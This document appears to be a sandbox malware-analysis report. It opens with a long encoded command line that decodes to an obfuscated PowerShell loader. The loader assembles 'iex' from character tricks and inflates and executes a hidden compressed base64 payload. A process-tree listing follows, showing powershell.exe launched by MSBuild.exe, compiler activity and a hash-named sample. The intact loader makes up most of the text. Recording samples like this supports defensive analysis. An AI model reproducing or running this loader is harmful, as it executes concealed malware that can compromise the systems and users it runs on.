ABBAFIAIAA+AG0AMgBZAFsAOgBQADYAWQBGAEIARQA9AD4AWQBFAHQAMgA5ADEAaABfAG0AUgByAG8ASABnAD0ALQBOAFUATgBIAGoAcQBrACoAQAA9AG0AUQAyAGUAeABAAC4ANABFADEAKAB3ACoAMwBfADQANQAhAEEAWQB6ADkAUwAqAGEAKwApAFQAQABGAHYAOABAAEkATwBHAFcAfQAsAGQAeABqADEAUwA7AEcARAAzACAAYgA/AC4AKwB0AGcAPABbAFEAcgBpAHkAUAA8AFQAOAAgAGYAegAlAEUAUwBtADsAYQA3AFYAUQBWAEYAdAA1AHgAMABQAGsAbwB6AHkAVAA3ACwAIQBqAHUAcgBFADEAIwAwAE8AfABiAFgAYwB6AFEAaABNAGoAVQBPADAAegB1AGwATgBkAGoAegB5AHYAZgA+AGIAegBaAGcAIwBjACoAbQAlADAAYgBBADEANgBeAGIAWQBTAFgAQQAkADMAWQAoAGUANwBRAD8ASgBvAHQAZAAhAFcAeAA0AGUAVAA0ADYAcQBRACsAcAA2AC0ALAB3ACQAewAlAGUAJgBUADgAQAA7AH0AJABVAFkANABKAF8ASgBYAD0AMwB2AD4ANgAuAGMAewBxAGoARABuAEQALAB2AGIATgBUAFMAXgB4AHoAOwByACgANQBeACwAKgAkAGQATwBkAHoAMgApAGIAegBvAGgATQBjAD8AQQB7AEUAPgAxAD0AOgBHACYAbwA3AEQANAA4AC4AUABOADEARwB2ADcAUgA3AF0AKABAAHIAOgB2ADgAegBCAEEAIABTAD4ANQBZACgAfQAlAFYANwBtADsAcQBOAG4AQwBxAGgAJgBpAD0APQA2ADMAPAAzAHYAKwArAHIAQwAuADgANwBtADEAaABzAFoAOgBuAFgAMwBtAHcAXwA2ADUALQBWAFIAPgAxAFkAZwAkAH0ARABOAEsAPgAgAG4AJgBAAHsATAAjACgAKQBiADIAcABpADMAeABbAHgATwBDAGYAZQBAAEQASABJAFMAKQBWACUAbABmAF0AOwAxAEkAZwBBAEEAUABKACsAeQB4ACoASwBnACMATABoADwAXgBlAHwAOwBGAHgANABXAEAAOwAmAC0ANABWACoAbgBIACsAXwA/AFQALgAhADYAVABLADgAIABbAD8AXQAjACQAeABxADAARwBGAG4AWAB5AHoAMgBVACoAfAApADIAagAsAHUAeABAADQANwAhAGkAMQBoADMAWgBFAH0AKwBMADUAeQBtACUAewA7AFEAbgAzADoAfQBlAEYAYgAyACwAIwA7ACkAIQBsAFAAXwBdADUAbQAhAFoAbgBRAEIAegBXADUAbgBrACQANwB4AD4ARQBhAG8AIAAxACYAOQBKAHkAYwBMAFAAUQAgADUAXgB6ADIAdwB7AFAAKABUAFgAZQAjAHAATgAxAHkAOQBYAC0AJgAxAC0AawBAAFEARwB3AFAAeQB2AE4AUwB7AEoAawBiADoAXgBqADoAUABrAGUAcAAuAFEAegBGAFQAPgB6AEUAfQAsAFYAKgA1AFIAMQBlADYATAB7AHkAfQBVAD8AIAAmAF4AMAAgAFIAXQBZAHsAdQA1AEIAUABNAE4AbQB4AHIAMABMADIAbwBpAE0AMAA9AFcAVQBwAGsAIwBSAC4AcAB8AFIAcQBMAHEAeAByAEIAYQBFAD0AMAAoAFIAdABWAFIAIQB7ACgAYwBIAGoAaQBYAHwAQABbAEAAawAkACAAZQBdAHsAYwBoAFQAKQBVADsAIAA8AHIAYgB1AG0AdQA3AFsAbQA7AGIAMQBiAG0AWQBQAG4AfAAlACgANABNADAANwBFAGUAWwBCADAARAA8AF8AYgBoADwAaABKAGIAUgA5ADgAQgBqAHMAWAB5AGQAZgB1AC4ARgA4AFkAfAA4AGQAWgB0AFsAMAAwAC4AeQBhAFUAeAAxACQATgBzACsAQQA2ACYAPwAoAEYAZwA6AHAADQAKACAAIAAgACAAIwAgAGMAKgBSAHYAagBvAFoAZAAhAHcAdAAmAFUAWgBkAGsAfQA0AHQAVAB1ADgALQAuACQANgB9AHQAUAA+AG8AQQBTAFoATAArAFUATwBxAGYANQB4AH0AKABCAG8AUwAmAFEAaQB6AD0AcwBHAHoANwA6AGkAQQAgAGgAOgBFAF0AMgA3AFoATwB4ADQAMABdACkAMgA0AEAALgAuADgAbQBFAEUAbQBkACQALQBVACAAXQBNAEgAcwAmADIASgBiAHsASgBvAHQAPwBxAGUAUQBOAFAAawAoACQANgByAEgAKQBiACUAUgBBAHkATgAqADAAMABeACAAQAA/AEUAJgBDAEwAWwB3AGUAQgB7ADEAVgBCAD4AMwBmAG0APABrACwAOwBaAE4AdgA6AG8AJAA/AFkAcQAyAGcAcABNADUAKgBNAEwAcABkAHYAcgBmAFUAYgA8AGQASQAwAEwALQBwADYAOQBoAHYAXgB1AF4AWwB6AE0AWgBWAFMAWwA7AEIAawBFAHcAewBKAE8AKwBaADIAWQBQAFgAYgA9ACkAUABlAHIASQBSAEIASQBmAFAAZABfADgAeQAwAGYAKQBkACQASABVAD4AIQBlADMAQABQAHgAMgA5ACAAZwAlAD4AKQBuAGwAaAB7AFEAeAA0AHYAIwBnAEsAWQB2AD8ATQBrAGgAagBLACUANQBmAE8AfQAjAGEAbwA4AEcAQwB4AEoAUwBMAHkAeAAhAEgATgBZAF4AUQBaAFUAdABoAEgAIwB1ACEAXQAtADAASQApAEwATQBrADoASwA+ADAAegA4AEsAOAA+ADIAeABsAHYAYQBAAGsAWAB2AFUAVgA9AHAAZwBaAHMAXQBhAEEATAB8AC0ALABTACYAZwBtAEgASgBCAC0AeQBKAEYAVgB0AFgAZwBAAGoAPQBbAHsAZABJAFkARQBGAHoAMgBrAEoAbQBPAD0AOABqAEEAIABIAE8AfQA6ACYAIABTACAAWgAuAD0AdQBIAGEANwBGAFIAKAAyAEMAawBxAG0AUwApAEgALAA/AGQATgB4AFEAXQA4ADIAPwBlAGIAZwBWAHQARQBDAG0ANgBNAGMAbABDAD0AOABLACEAdQBDAFUAKwA6AHAARQAoAHgAewBIACAATgA1AGUAaQBYACkAOQA1ADAAcABvAFgAYwAkAFsANQBZACsAIwAtAE0AcwAsACgAKwBtAGMAVABsACwAVwBFACMAdwB1ACgAQwBLAFAASgAjADQAbQBjAGwAbQB2AEAAXQBaADIAWQBYAFMAWQBUAEYAUwBQADwAbABqADcAQgBlAGUAbwBSADQAeQA6AHwAWgBNAD4AOgB4AC4AXQBdAEUAIQB8ADwAYQAgAF0APABoACgAZQBdAHcAQABIAEsAagBfADYAOgAzADkADQAKACAAIAAgACAAIAAgACAAIAAkAGEAIAAgACAAIAAgAD0AIAAgACAAIAAgACAAIAAzADkAOAAwADsAJABiACAAPQAgACAAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABtAHAAOABGADEAQwAuAHQAbQBwACcAOwAgACAAIAAgACAAIAAgACYAKAAgACQAcwBoAEUAbABsAGkAZABbADEAXQArACQAUwBIAEUATABsAEkARABbADEAMwBdACsAJwB4ACcAKQAoACAAbgBFAHcALQBvAEIAagBFAEMAVAAgACAAIAAgACAAIAAgACAAcwB5AHMAdABFAG0ALgBJAG8ALgBDAG8AbQBQAFIARQBTAHMASQBPAG4ALgBEAEUAZgBsAGEAVABlAHMAVABSAEUAYQBNACgAWwBpAE8ALgBtAGUATQBPAFIAeQBzAHQAUgBFAGEATQBdACAAIAAgACAAIAAgACAAIABbAGMATwBuAHYARQByAHQAXQA6ADoAZgByAG8ATQBCAEEAUwBFADYANABzAHQAcgBpAG4ARwAoACcAcABWAFQAUgBiAHQAbwB3AEYASAAyAHYAeABEADkANABpAEkAZABFAE0AcwBpAGoAYQBKAHEASwBJAHAAVwBHAGQAcQB2AFUAYQBoAFYAMABXAHoAWABFAGcAMABsAHUAUwBUAFQASABqAGgAeQBuAEQAUwB2ADcAOQA5ADAAawBaAG8AVQB1AEcAMABWADcAaQBlACsATgA3AFgAUAB1ADkAVABuADIASwBBAHkANwB0ADYAcwBVAFMAUABVAGQAdwAzADAAcwBZAHgATQByAFMAVQA3AGIAcgBhAE0AOABpACsAVwBTAFQARgBlAFoAZwBXAFIASQB0AHIAUABlAEoASgBjAG0AVABxAEIAMwBLAFEAMQBvAGwAVQA1AEIAUAA4AFEAQgBaAE0AUABXAFUAWgBvAHYAUgBCAHkAUQBRAFAAQQBzAEkAMwBkAFAASgBGAEEAeQBNAHkAUwBQAHAAUwBFAGoAagB4AFcATQBzAFQANAA5AEsANABNAEIAWQA5AFMAdgAvADcAeQBuADQAeQByAG8ATQAzAHAAZQBCAFcAOABaAEkAcwAzAEcAUQBsAHcAbQBxAGQATABHAGEAWAA4AEgATABVAEUAYwA5ADkAdgB1AFAARABQAGMASQBBAEUAVQB5AEMAdwBKAEYAbgBCAGoATgBQAG0AVQBnAHIAegBSAEMAawB2AEkAbgBJAHEAcgBvAEEAdQBsAEIARgBuAFIASwB2AHYAaAB2AGgAYQB2ADIAdQBVAEwAbABjAEYASABMAGsATQBCAGoAaQBVAG8AWABvADEAZwBOADMAeQBKAHQAYwBtADUARwBBAG0AaABnAHYAUABpAE4AdwB5ADEAdwBhAGEAdwBlAHUARAAxAHMARABpAHMAegBLADgANgBOAG0AQwA3AHYAbwBaAEUANgBWAFUARAB6AFcASgBsAFkARABaAC8ASgBsAEsANQBWAGUATgBBAE0AdABzAFAAMABoAGsASQBUAEcATgBIAG4AMgAzADAAMwAxAHcAWABJAHMAKwBpAFMALwBTAE4AegBvAFAAUwBqAFQANABQAEkAdgBnAFgANABhAEgAaQArAEIAcQA0AGcAUQBtAGUAbQBZAEgAYgBDAEoAUAB3ADcAdwBMAFoAbgBHACsAQwBSAFQAMABSAGIAUABMAFEAZgBYAGEAOQBKAGEAdQBhAG0ATgBSAEcAVABEAGMASwBoAE8ANgBUADMAUgBGADUAMgAzAFkAZAByAGMALwBXAC8AbgBxADgAUABxAGYAMwBYAEcAUgBBADAAeABJAHYAdgBuAGMAaQB6ADYAdgBYADkANwA3AGgARgBYAE0AMQBtAEIAdwBiAHEATgBZAE0ATABWAEQAaQB2AFgAQgBaAFIATABlADIAMABLAG8AQQBOACsAeABkAGcAVgB5AGEAaQBMAEwAaQBHAE8ALwBhAG0AaABWADkASABEAEEAYgBNAE0AdQBVADcARABJADkAYgBkAHMALwBjAG8AYwA3AHoARAArAHIAcAB0AFMAUQA0AEwANAAzAGYAMwBnAGkAbwBnAGwAMQByAEMAcgBiAHgAQQBOAFcAZQBVAEcANQBlADgARAB4AHoAUwBuAGgASAA0AGMAbABlAG8ATwA5AFMALwB6AHcAWgBWADgAbAA4AHUATgArADUAQgBLAHkAMgBWAGkATgBWAGUAOABIAHQAQwBJAFkAcgA4AEYATgB1ADAASQB3AEoATgBqAE4AdAA4ACsANwBGAHMARQBjAEkAawBMAHoASgBIAGEARgBjADEAaABaACsANQBSADAAcgA3AGgAYwA1AG4AdwBKAHgASgA5AEcAWABLAGUAdABvADAANwBvAHoAWAB3AGwASAAwAEMAYgArAGMAbgBKAGgAVgBiAEoARwBjAC8AZwAzAFcAQgBxAE4ARAA3AHMAagB2AE0AQgBUAEIAZgBuAEQAYQBBAEEAMwBRAGwALwBKAEoAMgBGADYAKwBLADEAdQBzAFAAVgBFADIAZABXAG4AdgBsAHgAZgA5ADcAaAB0AEIAUABpADcAMQA4AD0AJwAgACkALAAgAFsAcwB5AFMAVABlAE0ALgBJAG8ALgBDAE8AbQBQAHIAZQBTAHMAaQBPAE4ALgBjAE8AbQBwAHIAZQBTAFMAaQBPAG4ATQBvAGQAZQBdADoAOgBkAEUAQwBvAG0AcAByAGUAUwBTACAAIAAgACAAIAApAHwAJQAgACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAbgBFAHcALQBvAEIAagBFAEMAVAAgACAAIAAgACAAIAAgAEkATwAuAHMAdABSAGUAYQBtAHIAZQBhAGQARQBSACgAIAAgACAAIAAgACAAJABfACwAWwBTAFkAUwBUAGUAbQAuAFQAZQB4AHQALgBlAG4AYwBvAEQAaQBOAEcAXQA6ADoAQQBzAGMAaQBJACAAIAApAH0AIAAgACAAIAAgACAAIAAgAHwADQAKACAAIAAgACAAIAAjACAARwBiAEIAdQB1AHIARQAtAGEAdgBCADkAPwBiAHUAPgBhAGYANwBfAFgANQB6AFUAKABwADgAQABOAG4ASwA8AEsAcAA1ADMAfAAzAEgAVQBMAFoARgA4AE8AZABxACQAJgA5ADYALABZAGsAcgA4AHIAfQA/AGkAOgBWAE0AUABlAEUAeABhAEQAPABdAEIALgBqADIAewAwAHcAOABSAHkAMwBGAC0AeAAoAHoAdABjAEYALQAhAHYAPgBnAFgAfQA5ADwAewBpAEUASAB1AD8APwAyACoAeABkAF8AbgBCACoAKQBMAGIANwA8ACMATgBBAFMAUABjAGoARQAsAEYAPABJAHEALgBrAHkAIQB0AEQANQBmACgAPwBfACMATgAlAFsARwBrAF4AVgArAFEAMwAqAFAAIQB2ADAAbwB5AFsAbQBMADEALgAyADoAbwBAADEAegA3ACwAOwBrAEEAdgBmADMAfQBzACUAUQBAAEgAVwB7AH0AdABlADgALQAoADkAKgBxACUALABwAFgAeAB0AD0AJQA4AGMAYgBqADAANABGAE8APwA+AGkAcQBqAEwAXwA4AHQARgA4ACgAbAA0AFkAMQBiADQAWAA/AGwANgA9AA0ACgAjACAAUQApACgAbwAuACwAUQBDAHAAXQBoAGYARwBvAHYAWwBPAEsASwBzADQAPwA1AFMAWwBuAEcAZgBZAHMAOgBxAEoAPQBoAF4AagBqAD0AUAAoACMANwBPAGIAWABHAFUAIABhAF4AJgA8AEcAVQAmAE4AfQBHAFAAJABPAE8AVQBOAHoAWQBbAF4AQwB4AF4AeQBbAFAAVgB1AHYAVgBWAG0ASAA1AHYAMAB6AGcAUwBCAGMAQQAsAEAARQB6AGIANgAsACAAUgB3AHEANwAkAEQAaQBWAEcAVAB8AH0AUgBOAEcASQBqAC4AawBWADgAPAAwACAAMgBYACQATAA8AEIAZAA7AG0AQgBhACoAUQBZADkAKAB1AF0AcQA0AHsAcgBsAFEAbgA3ADQAawA4ADgAegAxAH0AYQAyAFYAPABDAFQAJABAAGEARABbAEUAKAByAFUARQAxAGsAZABlADsAWQBYAFoAdQBLAHIAKgBxAE0AOAB9AGUAKwBKAFIAMwBBAGUAXgBWAD8AeABpADQAPQBRAEgAMwBhAFoAUQAzACwALgBTADkAeABbAC0AOABiACEAZAAmAFgASgBhAC4APAByACsAVQAjAGMAUAA3AD4AMABFAF0ARAAwAG4AWABxAFMAPQBrAHsAVQB9AGoAJQBMAE0AZgB7AGMAYwBjAGEAOgBZAG4AYQBqAE0AZgBGAF0ARwBnAGUAQQAxAF0AZAB5ACgAbAB6AC4ATgAqAG4ATABhAFIANQA/ADYAWwAzAEMASQAwADYAIQBGAFkAbgAtAGYAVAB9AEwAdQBBACsAaAAgAEwAZABdAGgAYgBhAGQAZAAkACoALABwAGYAPQArAGUAdwAmAHkASABxAFUAVQBJAHsAaQBeAE0AKABjAC4ASgBKAGwAQQAyADUAVQAtAGIAUAA7AG0AUwBMAHoAdAAoAHYAKgB8AFQANgBoACwAKgB0ADUATwBkAEkAYgAkAGYAQABSACwAVgAwAEIAYwBtADkAVABFAGsAYQBbADsAVwAxAEcAYQBjAFgAVgApAFIAcABaAHgAOQA2ADcATQBbACkAZgBLAHsAWQB4AD8AJQBbAHQAPAA5AH0AegA8AFgALAAoAH0ANgBMAFsAeQBqAGYAJAAhAGIAQQAgAFQASQA2AHgAYgBMADcAJQBHACwAYwAoAD0AVABwADAASgBHAF8AIwAwAFAATwA0AEkAMAAjAG4AWwBTAGsAJgAhAEkAbwBUAC4AegB2AFYAaQBvADYATQBMAD8AOAB6ADEAbAA8ADgAIwBtAFUATwAjAEsAfQAgAFgAUABJADwAWQA7AGkAVgB3AEAASQB6AHgAUgBlAGoATwB6AEsAJAAmAD0AKQAzACYAWABOAHsANwAjACwAMAA5ADwAJABEAEAADQAKACAAIAAjACAAQQA5AHgAdAAsAEQAOABzAE0AOQBlAHMARgApAEMAZAAgADcARAAyAEMAYgBdACsAUQBeADkAOQBAAEEASAAhAHgAfQBSAEMATQBIAE8ASgBvAFAAOQBeAC4ATwAyAEsAMABlAEgAUgBWAEUANQBBAFUAUAApAH0AUQB1AE4ARwBbACEATgBuAFUARAAkAF0ASgBaAHcAYgAsAG4ASgB5ACsAVABmAFAAeQA4AD8AWABdAGcAOwBuAHsAeQA/ACoAJgBLADsAKQA1AEUAZQAuAHoARQA1AGMAaABHAGoAWABQAE0AYwA4AHEAdwBaADAAcgAxADEAWgA8ADcARQBrAG8AMQBMAEcAcwA/AG4ARgBiACAAIABpAHAAJgAhADAAJQA3ADQAaQBKACYAMQBWACYARQB0ACMARgBPADUAQgBuAGoARgA8AGMAeQBeAHAAWwAzAHwAMQBdAHgALAAgAEUAJABuAEMAYwA5AHQANgAoAGMAdAA9ADkAPABSACUAOwBHAF0AVQBpAGgAdgBWADMAMABPAEwAMAA1AD4AMgAoAD4AaQApADsAZQBfAEYAegBnAGIAPgAkADgAcgAsAEYAIAB3AE4ALgBAADEAdgB6AHkAZQA0AFYAYQB1AGkAPAA8AEUALQBRAHEAPQB2ACQAbwA1ACQAUwBdAGEAfABoAHoAWgBiAG4ALQAjACQAWgBpAG8AZgAoAHwARQA1AHsAIABNAHAAfABhAFkAQABJAE8AcAB0AHsAMQBsACAAJgB4ADkAUQBlAFMAKgArAH0AXwBUADYAaQAhAE8AMgAxAEgAWgA3AEAAYwB3AHsAUwBaAHMAMwBjADQAIABCAGkANwAjADgASABPAEoAOgAmAGkATABrAFgAVQBLAHYAKQBnAEAAUQBhAHEAWAA/AGMAVABvAGEAKQApAGYAUQBEAEYAMwAyAEUALQBNAHIANwAtADsATwA3AGkATQB6AFIAbQBTACYAQQAmAEMAaABFAHYAbgB2AFgAbwBvAFgAPgA/AC4AeABlAF0ANwBeAF0APABoAHMAQQBIAHUAJABqADkANwA0AFQASQA+AFoAIQAhAEEADQAKACAAIAAgACMAIAA4ACUAcgBAAGsARAB2AG8AagAmAHsARABpADUAPgBdAFEAIwA4ADIAVQApAE0AdQB0AGcAJABLADUAVwBUAEIAMQAyAHAAewAkADUAXgA6AFoAWgAkAD0APAAtAGYAPQBdAEwARQBXACoAUAAhACMAJAB1AHMAYQBwADgAdwB5AHoAYwBVACMAYgA1ADMAbABEAHEAKgBfACUAZQAhADkAYgAkAFEATQAqAEkAaQB2ACYAcgAxAFEAOwBQAE0AKgA9ACAAKAB8AHwAJQAhADoAJgArAE0ANQAhAFkAMwAgACEAUABRACEAfQBCAF0ASABpAHUAMQBbAFcAewBUAFkAYwBMADIAfABBADcAMQAyAGIAOABvACQAQQAhAGgAVwBDACoAUABsAGUAJgA0AH0AWQBDAF8AYQBSAFUAMwAoAG4AeAA0AFAAOABBAFMAOQA5ACYAawBiADsATAB0AHQATQAkAG4ATgApAC4AeABkAGUAbgAyAEMAJgBtADQAQAA1AHQAdQBkAHEAZwBlAHgAYwB4AFoATQAqAFAARABYADwASgBpAE0ASABCADEAUAApAFgAJQA0AGcAXQA6AGYARABxAE4ANwBMAHwARQA3ADsAZwBRAG4ANQBjAEQAZQB6AGgAfQAkAE0AaABxAF4AcQA4AGIAYQBuADsATQBaAE8AWAAtADAAfQBmADoAWAB3AEAAWwBNAD8AQAAsAGEAcwBLAE4AQQBSAD4ALgAhAEYAMQBpADIAcAA5AEYAXwBfAG8APwA5AHwAYgBuAH0ANwA0AHwAfAA+AG4AKABTAF8AWwAoAHMANABAADMALgAzAFoAJABzAHUAPAByAEUAVgAkAF0AOAAqAEYAJgA1AE4AKwA7AHAAewAjAHUAagApACAASQB7AGsATAA1ACQAcABAAEIALABqAFMAXQB5ACwAPgBBAD8AJQBLAGMAdQBZAHcAIQBQAHsAdQA9AEYAZAAqACYASQBPAEgAQABoAE0AYwB4AF8AcQB1AFgAbwBuADcAKQAlAG0AZgB3AEIANQBhADUAYgBmAHcAVABuADwAdAA8ADoAJABrACQAeQBqAGUAWQBwAHsAKABeAFAARwApACwAUQBXACEAQgBqAEoAcABOAGEARQA5ADIAdQBVADIALABUAGUAUABGACgARwB5ADoAIAByAEwAbQBHAEUAcgBjAFYAVwA5AHMAKQBhAEwAdgB7AEYAPwA9AEcANgB3AEoAdAA5AGkAZABxAGcAIwBBAHgAQgA4ADEAcAA0AEsAQQAlAEsANwBqAGUAbwB4AGwAdgBYAEIAIwA+ADsATgAoAE0ATQBZAE8AaAA8AFcAQQA+AFsAVwBnAEUAMQA5ACoAbwAjAG0AXQAhAFYAXgBaACUAXQB3AFMAegBNAE0AWAA3AHQAKQA+AGgANQBWACkAPgBGAD8APgAyAEkAXgBsAGgAUwBmACoAOgApAFQAVABnAE8ALgBdAH0AQwAmAHIAagBrAHwARQBrAHcAbwBbAGoAIwBRADEAfQBiADkAeABPAD8AWAAtAGwATAAtACgAKAA8AHkAQwBIAC0ALQB1ADgAMwBaADoAPgBRAGsAOgB9AHcAbwAwAFYAcwBZAGsAYgAhAEsAOwBiADIAQgAsACEAdwAwAEIALABfAHUAUwBFAEQAagAzAHkAeAA4AHMAJgBkAFYARQAzADIAZAB8ADcAbwBsAFEAdgBOAEkAaQBtADYAPwA8AEYAJABlAEAAaAAhACwAYwAtACgAaAByAEsATwBeAE4AdgBKAFAAdgAuAHAAXQBzAGwAdAArACMAMwBbAHgAdgB2ACAAJQAyACYAeAArAHAATQA/ADcAVwAsAFIAawBrACgAJgBsAHgAYgBnAGkAZwB4ADUAXgBYAFsAIQBvAD4AWgArADYARgBHAFkAdwBDAEgATwBwAF0AOgAsAFsAUQArAGkANQBGAGcASwBRAEYAVgA4AE4AaQB5AF0AdABdAHsAPABuAEsASwA4AG4AXwBFAFQAeABiACgALABDACkAPQBCADIAagBFAHEAJgBKAF4AMABpAGUANQA8AFQAIwBhAHMAWAAzAHoAKABJAGMAagA3AEcAUwBfAF0APwBfAHcAawA9AGUATQB9AC4AfQBRAEkAeAA8AD4AdQB6AE8AYgBIADMAWQBxAEgAZgB0AC0ASQBBAHUAeABfAEcAYQBkAHcAUwBwAE8AZQBKAG0AVgBmAEYASAB5AGQASABEACQADQAKACAAIAAgACAAIwAgAG8AUwBPAEgAVQBFAHUAKQBdAC4AOAAgAC4AWAA4AGIAaABCAGsAWABaADwAQABIAFMAfQAjAHoAPgBUAEsARQBbAC0AcAA+ADYAXQB0ADwAPwA4AHEAdAAmAFIATgB0ACUAaAA3ACwAZgB1AHIAQABzAFsAawBtADoAUgAqADIAMwA0ACwATQA+AHQAcQBrAFQAXwBbADsASwBSAGsAVQBmAGcAfQBxAEcAOwBnAFAAOwBbAHoAfQB3AEYAOABSAEcAQQAuAFEAPQBiAHgAWwBJADwAZABzAHUAVQBxADcAbQBuAGkAKQAjAGcAWgBNACkAMQAlAF4AIQA0ADUATwA3AEIAIABGAFIAVQAoAD4AJABwAHwAWQBQACsANQAxAGUAaQAwAHoAYgBIAGYAVAB4AGQAdwBrAEMAbQBEAEoAUwBdACUAPgBQAFEAUAA9AHYAMQBMAEgAQgBUAEIAJgAyAHIARwAoAGoAPgBzAGgAXwB3ADEAJgB2AGMAewBAAHwAOwA4AHcAOQAjAGsAVABMAE8AfABZADMAcQByAHEALABWAEIAbwBBAHwATQB4AFEAPQBUACEAWwAjAFUAUQBfAHUAbwA/AEkARwA2AFkAXwBmACQAbgBqACYAQwB4AG8AYwAxAFkAMwBvAEcAXQBVAHkAbwBmADMAJABoAHIAJgBIADwAIQB9ACYAMgBpAD0AKgB5AHIAKAA3AGQAWwAhADEAZQBUAFsAJQA1AEEAJABfAG0AZQBsAGEATQB2ADEAeAA2AEYAJQByAH0AJQAkAFIASAB3AHgAYgAuACUAYgA0ACMAdQByADcAKwA4AEUAVwBdAGwAIABnACYAOwA7AGwATgBJAFEAewAzAE4ASwAxAGEAOwBjACMAYQAgAG4AJQBAAHgAKwBIAD0AIQAgACMAPQAzAFkATQBmAEkALgAtADcAQwBxACUAcwAzAEkALQAuAE0AJABbACEAVABQAHwAJQA4AEcATQAxAF4AbAArAG8AXwA6AHAAMgB5AEEAQQA+ADsANQAxADoAKABYAFcALAAoAGoAZgAxAEsAdgBNADsANwBNAFoAPwBBAEIARABTAHsATABXAHoAMwBNACoAaQAoAHMAQAAgACQAPQBKAHcAbwB5AEEASABmAEUARQAoAHIAegB2AGgAaABMAEwASwAgAF0AWABKAEYAPwBnACAAKgBlACQAcQB1AEYAaAByAGMAKwB5AFUAQQA9AHMAIwBSAHAAVQA2AGwAbQArACQAIwA3ACMAOwAtADkAXQBCAFIATgBoAF0AWgBFADwAfAB1AHwAagBdADYAPABNAHAAVgB9AHkAUQAwAGcAaABVAE4AZwBaAGkAdAB4AG4ARABxAC4AewAwADoAaQBYAGMARQBUACQAKgBeADoAVQAxAEsAZQA0AFIANQBVAC4AbAAoAGEAVgB6AE4AeAAhACMAUgBdADYAZQBBAEYAUwAkAD4AMAA0AFoARQBDAF0ARwBCAHgADQAKACAAIAAgACAAIAAgACAAIAAgACAAJQAgACAAIAAgACAAewAkAF8ALgBSAGUAYQBEAFQATwBlAE4AZAAoACkAIAAgACAAIAAgACAAfQApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
724C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES742C.tmp" "c:\Users\admin\AppData\Local\Temp\CSC45DEC2E7EBBD43CFAABC4C64A248F797.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
1068"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc4567fff8,0x7ffc45680004,0x7ffc45680010C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1096"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe4edf31270b3545c84273744e738a576bfbae65febf6f469df57a70ac09d8f665.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
1096\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
